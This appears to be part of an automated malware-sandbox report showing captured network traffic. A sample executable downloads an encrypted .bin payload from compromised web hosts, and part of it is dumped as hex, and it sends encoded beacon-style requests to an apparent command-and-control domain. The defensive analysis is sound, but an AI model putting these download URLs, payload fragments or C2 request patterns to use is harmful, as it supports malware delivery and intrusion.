                                                                                                                                                                                                                                                              Data Raw: 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c 8e 41 0a c3 30 10 03 ef 7e 45 c8 03 b2 31 69 6f ea 1e fb 8f 3a 5e b2 06 c7 06 b3 d0 f6 f7 25 69 02 a5 27 81 34 42 82 da 9a d9 41 e5 11 19 96 2c 0b 5f c6 a9 bb d7 16 52 8c 52 40 5f 13 b4 23 0e a1 c6 77 17 96 b9 e6 da 6e fd 53 93 49 cf 0e b3 14 93 c6 50 ff df 57 cf a0 23 76 d0 c6 27 5b 96 54 5e e4 07 7f 1d c6 1f 82 b6 85 4d f7 6b 1f 00 00 00 ff ff 03 00 96 12 38 3e a1 00 00 00 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 89\A0~E1io:^%i'4BA,_RR@_#wnSIPW#v'[T^Mk8>
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:15.028708935 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              61192.168.11.2049810104.21.50.20280
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:17.198030949 CEST555OUTGET /p1v4/?FlS=3ldH5dkH-dBLf&9B6h=XW3vckNGBZMqkh6dDgKTVQdtxgWhQhuqI1UaXPyLgSYWv7ViPFn3HMqwy3qnuuGBWlC3pPEFi6D5pQsjZrraxjUjA6OulNf3kQwJOyuMay6JsEDMWEmFSkY= HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.itemfilterhub.shop
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:17.776850939 CEST784INHTTP/1.1 404
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:43:17 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html;charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eAEl2Yi82zICcqd0LjBZQV9jodteUMXckMbjqFatA%2FVEHvr5IacdkVdr5w36D%2F%2BVeOBfm6kcokKGFp%2FSI4pADQo3xRPldXYkHgR37BW2xm3DkgF3LytgQqtz3BM%2FqqsVmXn37VG7Emmc"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8cfe1cb4c91b8c24-EWR
                                                                                                                                                                                                                                                              Data Raw: 61 31 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 35 2e 30 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: a1<html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.15.0</center></body></html>
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:17.777185917 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              HTTPS Proxied Packets

                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              0192.168.11.2049738170.249.236.534436456C:\Users\user\Desktop\ImBm40hNZ2.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-10-09 11:34:55 UTC181OUTGET /sCvgayhFHxN196.bin HTTP/1.1
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                                                                                                                                                              Host: secretspark.com.bd
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-10-09 11:34:55 UTC535INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                              cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              link: <https://secretspark.com.bd/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                                                                              x-litespeed-cache: hit
                                                                                                                                                                                                                                                              transfer-encoding: chunked
                                                                                                                                                                                                                                                              date: Wed, 09 Oct 2024 11:34:55 GMT
                                                                                                                                                                                                                                                              server: LiteSpeed
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                                                                                                                                              2024-10-09 11:34:55 UTC833INData Raw: 31 30 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 65 63 72 65 74 73 70 61 72 6b 2e 63 6f 6d 2e 62 64 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 53 65 63 72 65 74 20 53 70 61 72 6b 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74
                                                                                                                                                                                                                                                              Data Ascii: 10000<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><link rel="profile" href="https://gmpg.org/xfn/11"><link rel="pingback" href="https://secretspark.com.bd/xmlrpc.php"><title>Page not found &#8211; Secret Spark</title> <st
                                                                                                                                                                                                                                                              2024-10-09 11:34:55 UTC14994INData Raw: 6c 73 65 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 20 45 6e 64 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 66 6f 72 20 57 6f 72 64 50 72 65 73 73 20 62 79 20 67 74 6d 34 77 70 2e 63 6f 6d 20 2d 2d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 53 65 63 72 65 74 20 53 70 61 72 6b 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 65 63 72 65 74 73 70 61 72 6b 2e 63 6f 6d 2e 62 64 2f 66 65 65 64 2f 22 20
                                                                                                                                                                                                                                                              Data Ascii: lse;</script>... End Google Tag Manager for WordPress by gtm4wp.com --><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Secret Spark &raquo; Feed" href="https://secretspark.com.bd/feed/"
                                                                                                                                                                                                                                                              2024-10-09 11:34:55 UTC16384INData Raw: 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 64 2d 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 62 6c 6f 63 6b 2d 6e 6f 74 69 63 65 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 73 65 63 72 65 74 73 70 61 72 6b 2e 63 6f 6d 2e 62 64 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 57 6f 6f 64 4d 61 72 74 25 32 30 54 68 65 6d 65 2f 63 73 73 2f 70 61 72 74 73 2f 77 6f 6f 2d 6d 6f 64 2d 62 6c 6f 63 6b 2d 6e 6f 74 69 63 65 73 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 37 2e 36 2e 30 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73
                                                                                                                                                                                                                                                              Data Ascii: ='text/css' media='all' /><link rel='stylesheet' id='wd-woocommerce-block-notices-css' href='https://secretspark.com.bd/wp-content/themes/WoodMart%20Theme/css/parts/woo-mod-block-notices.min.css?ver=7.6.0' type='text/css' media='all' /><link rel='styles
                                                                                                                                                                                                                                                              2024-10-09 11:34:56 UTC16384INData Raw: 0a 09 2d 2d 6e 6f 74 69 63 65 73 2d 77 61 72 6e 69 6e 67 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 7d 0a 2e 77 6f 6f 64 6d 61 72 74 2d 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6c 61 79 65 72 65 64 2d 6e 61 76 20 2e 77 64 2d 73 63 72 6f 6c 6c 2d 63 6f 6e 74 65 6e 74 20 7b 0a 09 6d 61 78 2d 68 65 69 67 68 74 3a 20 32 32 33 70 78 3b 0a 7d 0a 2e 77 64 2d 70 6f 70 75 70 2e 77 64 2d 61 67 65 2d 76 65 72 69 66 79 20 7b 0a 09 2d 2d 77 64 2d 70 6f 70 75 70 2d 77 69 64 74 68 3a 20 35 30 30 70 78 3b 0a 7d 0a 2e 77 64 2d 70 6f 70 75 70 2e 77 64 2d 70 72 6f 6d 6f 2d 70 6f 70 75 70 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 31 31 31 31 31 31 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 65 63
                                                                                                                                                                                                                                                              Data Ascii: --notices-warning-color: #fff;}.woodmart-woocommerce-layered-nav .wd-scroll-content {max-height: 223px;}.wd-popup.wd-age-verify {--wd-popup-width: 500px;}.wd-popup.wd-promo-popup {background-color: #111111;background-image: url(https://sec
                                                                                                                                                                                                                                                              2024-10-09 11:34:56 UTC16384INData Raw: 61 6e 20 63 6c 61 73 73 3d 22 77 64 2d 74 6f 6f 6c 73 2d 74 65 78 74 22 3e 4d 65 6e 75 3c 2f 73 70 61 6e 3e 0a 0a 09 09 09 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 3c 21 2d 2d 45 4e 44 20 77 64 2d 68 65 61 64 65 72 2d 6d 6f 62 69 6c 65 2d 6e 61 76 2d 2d 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 68 62 2d 63 6f 6c 75 6d 6e 20 77 68 62 2d 6d 6f 62 69 6c 65 2d 63 65 6e 74 65 72 20 77 68 62 2d 68 69 64 64 65 6e 2d 6c 67 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 6f 67 6f 22 3e 0a 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 65 63 72 65 74 73 70 61 72 6b 2e 63 6f 6d 2e 62 64 2f 22 20 63 6c 61 73 73 3d 22 77 64 2d 6c 6f 67 6f 20 77 64 2d 6d 61 69 6e 2d 6c 6f 67 6f 22 20 72 65 6c 3d 22 68 6f 6d 65 22 20 61 72 69 61
                                                                                                                                                                                                                                                              Data Ascii: an class="wd-tools-text">Menu</span></a></div>...END wd-header-mobile-nav--></div><div class="whb-column whb-mobile-center whb-hidden-lg"><div class="site-logo"><a href="https://secretspark.com.bd/" class="wd-logo wd-main-logo" rel="home" aria
                                                                                                                                                                                                                                                              2024-10-09 11:34:56 UTC566INData Raw: 74 22 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 68 32 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 68 65 61 64 69 6e 67 2d 74 69 74 6c 65 20 65 6c 65 6d 65 6e 74 6f 72 2d 73 69 7a 65 2d 64 65 66 61 75 6c 74 22 3e 43 6f 6e 74 61 63 74 20 55 73 3c 2f 68 32 3e 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 20 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 31 33 34 38 66 35 61 20 65 6c 65 6d 65 6e 74 6f 72 2d 69 63 6f 6e 2d 6c 69 73 74 2d 2d 6c 61 79 6f 75 74 2d 74 72 61 64 69 74 69 6f 6e 61 6c 20 65 6c 65 6d 65 6e 74 6f 72
                                                                                                                                                                                                                                                              Data Ascii: t"><div class="elementor-widget-container"><h2 class="elementor-heading-title elementor-size-default">Contact Us</h2></div></div><div class="elementor-element elementor-element-1348f5a elementor-icon-list--layout-traditional elementor
                                                                                                                                                                                                                                                              2024-10-09 11:34:56 UTC16384INData Raw: 62 61 39 39 0d 0a 74 65 6c 3a 25 32 30 2b 38 38 30 31 33 31 33 39 34 34 38 35 32 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 0a 0a 09 09 09 09 09 09 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 69 63 6f 6e 2d 6c 69 73 74 2d 69 63 6f 6e 22 3e 0a 09 09 09 09 09 09 09 3c 73 76 67 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 65 2d 66 6f 6e 74 2d 69 63 6f 6e 2d 73 76 67 20 65 2d 66 61 73 2d 70 68 6f 6e 65 2d 61 6c 74 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 31 32 20 35 31 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 3c 70 61 74 68 20 64 3d 22 4d 34 39 37 2e 33 39 20 33 36 31 2e 38 6c 2d 31 31 32 2d
                                                                                                                                                                                                                                                              Data Ascii: ba99tel:%20+8801313944852" target="_blank"><span class="elementor-icon-list-icon"><svg aria-hidden="true" class="e-font-icon-svg e-fas-phone-alt" viewBox="0 0 512 512" xmlns="http://www.w3.org/2000/svg"><path d="M497.39 361.8l-112-
                                                                                                                                                                                                                                                              2024-10-09 11:34:56 UTC16384INData Raw: 72 6f 75 6e 64 20 29 3b 0a 09 09 09 09 09 7d 20 29 3b 0a 09 09 09 09 7d 3b 0a 09 09 09 09 63 6f 6e 73 74 20 65 76 65 6e 74 73 20 3d 20 5b 0a 09 09 09 09 09 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 0a 09 09 09 09 09 27 65 6c 65 6d 65 6e 74 6f 72 2f 6c 61 7a 79 6c 6f 61 64 2f 6f 62 73 65 72 76 65 27 2c 0a 09 09 09 09 5d 3b 0a 09 09 09 09 65 76 65 6e 74 73 2e 66 6f 72 45 61 63 68 28 20 28 20 65 76 65 6e 74 20 29 20 3d 3e 20 7b 0a 09 09 09 09 09 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 20 65 76 65 6e 74 2c 20 6c 61 7a 79 6c 6f 61 64 52 75 6e 4f 62 73 65 72 76 65 72 20 29 3b 0a 09 09 09 09 7d 20 29 3b 0a 09 09 09 3c 2f 73 63 72 69 70 74 3e 0a 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74
                                                                                                                                                                                                                                                              Data Ascii: round );} );};const events = ['DOMContentLoaded','elementor/lazyload/observe',];events.forEach( ( event ) => {document.addEventListener( event, lazyloadRunObserver );} );</script><script type='text
                                                                                                                                                                                                                                                              2024-10-09 11:34:56 UTC15009INData Raw: 20 20 20 20 20 20 3c 5c 2f 64 69 76 3e 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 5c 22 77 68 62 2d 63 6f 6c 75 6d 6e 20 77 68 62 2d 63 6f 6c 2d 63 65 6e 74 65 72 20 77 68 62 2d 76 69 73 69 62 6c 65 2d 6c 67 5c 22 3e 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 25 2e 77 64 2d 68 65 61 64 65 72 2d 6d 61 69 6e 2d 6e 61 76 25 3e 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 5c 2f 64 69 76 3e 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 5c 22 77 68 62 2d 63 6f 6c 75 6d 6e 20 77 68 62 2d 63 6f 6c 2d 72 69 67 68 74 20 77 68 62 2d 76 69 73 69 62 6c 65 2d 6c 67 5c 22 3e 5c 6e 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                              Data Ascii: <\/div>\n <div class=\"whb-column whb-col-center whb-visible-lg\">\n <%.wd-header-main-nav%>\n <\/div>\n <div class=\"whb-column whb-col-right whb-visible-lg\">\n
                                                                                                                                                                                                                                                              2024-10-09 11:34:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              1192.168.11.2049739199.103.62.2054436456C:\Users\user\Desktop\ImBm40hNZ2.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-10-09 11:35:06 UTC180OUTGET /sCvgayhFHxN196.bin HTTP/1.1
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                                                                                                                                                              Host: www.groupriam.com
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-10-09 11:35:06 UTC422INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              content-type: application/octet-stream
                                                                                                                                                                                                                                                              last-modified: Mon, 23 Sep 2024 16:31:11 GMT
                                                                                                                                                                                                                                                              accept-ranges: bytes
                                                                                                                                                                                                                                                              content-length: 336448
                                                                                                                                                                                                                                                              date: Wed, 09 Oct 2024 11:35:06 GMT
                                                                                                                                                                                                                                                              server: LiteSpeed
                                                                                                                                                                                                                                                              vary: User-Agent
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                                                                                                                                              2024-10-09 11:35:07 UTC16384INData Raw: 68 5b 13 6d c2 64 97 b5 68 02 e5 a7 fc f2 08 d7 5d 85 97 0f 01 da 52 9a 6a 46 6c 81 8e 63 5e e7 35 a1 d2 35 66 89 15 17 88 53 13 2f 16 0d f8 47 b8 4b 62 9f 45 94 66 c5 ce ed 0d c8 77 10 ad 10 a5 16 73 56 c3 35 c0 aa b4 52 a9 b9 c1 cf 28 32 d5 4d d6 47 11 0c 37 0b 35 56 71 89 cc 85 32 57 5a 81 89 74 76 95 b0 4e 7f cb 41 bc 5c 10 58 d0 5a 72 c9 02 b8 fa a2 17 eb 62 82 d4 bf 97 91 93 8b b1 df 26 74 14 c7 8d 85 48 0e 93 94 0a 07 24 3f bb 18 72 2d 02 3c ae 5a d2 73 09 1d 86 05 56 5c 5d 19 b8 e2 4d 37 de cf 5a 69 fc b0 dc fe 4d 81 c2 f2 ef f4 76 ae 5b e7 76 97 76 d7 89 12 f1 ae ee 39 e4 f2 f6 3e f3 4c de d5 7f 02 e6 92 c3 0d c0 31 2b 58 25 c2 31 29 8c 56 37 d6 97 53 57 38 6c d8 f5 8f 4b 58 18 17 e4 28 a6 6c d8 db a6 e6 62 01 81 03 3d 48 d0 0b 9c 7e be 41 03 ef
                                                                                                                                                                                                                                                              Data Ascii: h[mdh]RjFlc^55fS/GKbEfwsV5R(2MG75Vq2WZtvNA\XZrb&tH$?r-<ZsV\]M7ZiMv[vv9>L1+X%1)V7SW8lKX(lb=H~A
                                                                                                                                                                                                                                                              2024-10-09 11:35:07 UTC16384INData Raw: ac e9 34 73 54 4a 5b bd 03 5d 55 33 e4 da 43 96 e7 9c e1 86 43 f6 13 9d d8 c9 70 c0 af 85 57 21 cb 15 31 44 16 b6 72 0a 9e 86 60 c5 19 8f 5d 93 51 27 0f e7 c7 df d0 80 14 de 52 e9 fa 3d 0a 01 37 2e 7e 5c e5 7d b6 56 f6 b9 c3 f9 d9 f6 db e7 6c c0 b0 ce ad 9f 77 db 7e 3c 0b 12 bd c7 96 eb 20 07 d1 04 32 ea 58 dd 14 00 23 74 a2 34 8c 5b a4 fe 05 84 1e 17 7a 3b 47 4f d4 a4 58 b6 f0 e6 ea 48 9c 67 81 e2 bf 05 5d 68 ca 46 9b bd 98 99 99 3f 06 5a 4d e3 74 2d 55 95 1e 0a 40 fc 78 8c e8 99 16 7b 6a d5 42 fc f8 6f f5 99 c4 55 41 e5 8d 8c 1c 72 9d 0b 00 61 3a 51 e8 bf 0a aa d1 78 0a 37 0f 2f 01 65 b9 81 9e 37 61 67 1f ed 5d d2 0b f8 9f d8 03 62 3e 11 0d 7e a5 be 07 da 62 02 a3 45 49 74 c6 59 62 62 f3 9c 1c 4b 6d bb 49 68 11 79 66 5c f1 e3 40 40 4c 5d 04 f0 73 b4 5c
                                                                                                                                                                                                                                                              Data Ascii: 4sTJ[]U3CCpW!1Dr`]Q'R=7.~\}Vlw~< 2X#t4[z;GOXHg]hF?ZMt-U@x{jBoUAra:Qx7/e7ag]b>~bEItYbbKmIhyf\@@L]s\
                                                                                                                                                                                                                                                              2024-10-09 11:35:07 UTC16384INData Raw: 77 3a da cf aa f7 6e 43 e3 53 35 f2 32 e0 8a 8f 2c 44 5a d4 c7 84 2e d4 42 84 49 e3 28 42 a1 0c 3e e4 04 41 4b 4e 6d 14 45 6f 48 0a 1d 0b 5c 7b f4 07 02 27 c7 5c 05 80 24 18 95 2a 00 a7 39 55 ef 1e 5e 8b cd 3e 7e dd da 22 8b 76 98 16 0a 94 3e 1b 21 33 ba f0 b6 50 5c 8d 87 24 42 bf 2a 46 76 44 34 eb 22 08 05 e9 91 43 56 22 2a 5b 09 11 07 7d 28 fe 9d 0a 96 c4 5e b5 68 c1 58 0a d0 d8 42 60 9b d7 82 b7 2b 4f 8b 11 fd 3e e7 82 74 b1 91 1d 2d 50 67 7c 7f 2c 1f 7e 2a 98 23 9e 39 69 9f 65 df d4 42 d4 0e 2f 68 1a 02 1e 04 bf 02 6a 46 bc e8 72 73 69 0c c5 40 91 29 0b 82 bb da cb 03 e6 19 5c 3c 0c 2c b7 5d a6 36 a7 db 34 39 c4 63 55 c3 dd 2b 86 7b 98 f5 a3 f7 83 3b e5 72 1d bf 1c dc 23 76 65 90 64 71 43 22 0b 95 4b c8 a8 f6 c9 b2 7e 45 24 3e d4 6e e7 d5 77 09 96 33
                                                                                                                                                                                                                                                              Data Ascii: w:nCS52,DZ.BI(B>AKNmEoH\{'\$*9U^>~"v>!3P\$B*FvD4"CV"*[}(^hXB`+O>t-Pg|,~*#9ieB/hjFrsi@)\<,]649cU+{;r#vedqC"K~E$>nw3
                                                                                                                                                                                                                                                              2024-10-09 11:35:07 UTC16384INData Raw: 01 d8 a3 83 37 e4 42 c8 eb 71 24 d7 9e 4f 50 5b a9 ed 1c 0c 90 e1 af c2 c0 a3 db 27 73 2f 48 88 dc f2 80 99 03 d7 a0 19 66 e6 d9 a4 c1 ad b2 c1 0f 16 81 87 10 e5 f1 35 92 1e d3 8a 33 c3 a6 1f b5 00 65 57 d0 ff 98 6c 73 a6 7d b6 df 4b 82 7a 2b 4e 16 bd 16 ea c5 b3 3d 90 8d e2 a5 87 f5 6c 0e 3c ac 3e 40 06 b9 4d d7 f0 81 da 77 91 15 9e 82 53 98 74 93 0f fd 53 fb 74 ac ed ba b0 3f 19 45 26 ee 9c ed 45 f3 25 33 55 39 1b cc dc a0 8c 23 98 2d c8 53 ea 2e 1e 65 1e 86 98 33 6f 1a 31 8a eb 43 77 bb ef 41 f1 61 09 6a b6 67 a3 0e d7 41 93 19 ff 86 96 f0 12 23 31 e9 b5 08 bc 36 d6 70 de 5f 68 0a ff 39 59 fb 8c 93 e8 a6 a8 bc d3 79 f1 85 62 ba 5d 7e 13 36 ff 96 8c b6 25 8d dc e6 bf a2 d5 91 2c 7e 8c c4 36 f4 be d8 f2 e8 25 31 df b8 79 c1 cf 48 4d 1e 0c 09 97 d6 c3 fb
                                                                                                                                                                                                                                                              Data Ascii: 7Bq$OP['s/Hf53eWls}Kz+N=l<>@MwStSt?E&E%3U9#-S.e3o1CwAajgA#16p_h9Yyb]~6%,~6%1yHM
                                                                                                                                                                                                                                                              2024-10-09 11:35:07 UTC16384INData Raw: 15 25 6e 98 a8 37 6a ce e9 b8 f2 49 d6 99 55 3c 6e 62 ba be e6 a1 c3 ce 18 14 10 36 4a 94 8b d8 9c 71 56 6a 5c 2e e4 f9 0e 0a 5a a6 93 da ca 7c 46 b8 1a be e1 a8 4f 73 cc 79 7c d2 ff 92 bc c8 aa 76 8c 82 8d c9 87 90 42 34 e6 ab 83 02 62 39 8e 61 e6 75 2f bd 66 f4 87 49 a9 5d d6 b4 02 d4 b3 4f ba 6c e5 8b 23 85 56 3e f1 70 d6 b5 23 0b 6d c6 a8 ac 6c 49 ff c7 17 dc 4c d7 a4 46 a4 40 0c f6 48 d2 ad f8 6d 01 cf 89 2f 36 7d 9a 54 79 d5 07 f5 9b 94 ac ef 23 15 40 5a 39 fa cf cd 8c 8e 23 34 c4 66 42 88 e4 1d 84 6f 8c 41 8e 75 d1 6c 97 7c 35 74 19 41 3e 92 b4 78 18 db 63 c6 0d 3c 59 1b 74 42 06 50 e3 40 7b 41 63 97 08 4b d1 07 5d a9 f6 9e 14 ad 89 11 b1 b4 f4 f7 92 1e 13 fc 69 56 06 52 8c 49 bc 60 63 5f 5c 75 d1 c3 29 76 51 58 27 80 dd 37 87 de 02 16 09 ba 59 1e
                                                                                                                                                                                                                                                              Data Ascii: %n7jIU<nb6JqVj\.Z|FOsy|vB4b9au/fI]Ol#V>p#mlILF@Hm/6}Ty#@Z9#4fBoAul|5tA>xc<YtBP@{AcK]iVRI`c_\u)vQX'7Y
